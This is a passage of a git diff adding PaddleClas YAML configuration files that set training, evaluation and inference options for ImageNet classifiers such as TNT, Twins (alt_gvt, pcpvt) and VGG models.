batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/TNT/TNT_small.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/TNT/TNT_small.yaml new file mode 100644 index 0000000..dff9af2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/TNT/TNT_small.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: TNT_small + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 248 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 248 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.5, 0.5, 0.5] + std: [0.5, 0.5, 0.5] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_base.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_base.yaml new file mode 100644 index 0000000..17fd657 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_base.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: alt_gvt_base + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.3 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_large.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_large.yaml new file mode 100644 index 0000000..393a638 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_large.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: alt_gvt_large + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.5 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_small.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_small.yaml new file mode 100644 index 0000000..b40f518 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/alt_gvt_small.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: alt_gvt_small + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.2 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_base.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_base.yaml new file mode 100644 index 0000000..4c7c099 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_base.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: pcpvt_base + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.3 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_large.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_large.yaml new file mode 100644 index 0000000..e0e5c6f --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_large.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: pcpvt_large + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.5 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_small.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_small.yaml new file mode 100644 index 0000000..547d258 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/Twins/pcpvt_small.yaml @@ -0,0 +1,161 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 300 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: pcpvt_small + class_num: 1000 + drop_rate: 0.0 + drop_path_rate: 0.2 + +# loss function config for traing/eval process +Loss: + Train: + - MixCELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: AdamW + beta1: 0.9 + beta2: 0.999 + epsilon: 1e-8 + weight_decay: 0.05 + no_weight_decay_name: norm cls_token proj.0.weight proj.1.weight proj.2.weight proj.3.weight pos_block + one_dim_param_no_weight_decay: True + lr: + name: Cosine + learning_rate: 5e-4 + eta_min: 1e-5 + warmup_epoch: 5 + warmup_start_lr: 1e-6 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + interpolation: bicubic + backend: pil + - RandFlipImage: + flip_code: 1 + - TimmAutoAugment: + config_str: rand-m9-mstd0.5-inc1 + interpolation: bicubic + img_size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - RandomErasing: + EPSILON: 0.25 + sl: 0.02 + sh: 1.0/3.0 + r1: 0.3 + attempt: 10 + use_log_aspect: True + mode: pixel + batch_transform_ops: + - OpSampler: + MixupOperator: + alpha: 0.8 + prob: 0.5 + CutmixOperator: + alpha: 1.0 + prob: 0.5 + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + interpolation: bicubic + backend: pil + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG11.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG11.yaml new file mode 100644 index 0000000..d8cdb98 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG11.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 90 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG11 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.1 + regularizer: + name: 'L2' + coeff: 0.0002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 128 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG13.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG13.yaml new file mode 100644 index 0000000..75565b8 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG13.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 90 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG13 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG16.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG16.yaml new file mode 100644 index 0000000..6f0db08 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/VGG/VGG16.yaml @@ -0,0 +1,128 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 90 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: VGG16 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.01 + regularizer: + name: 'L2' + coeff: 0.0004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 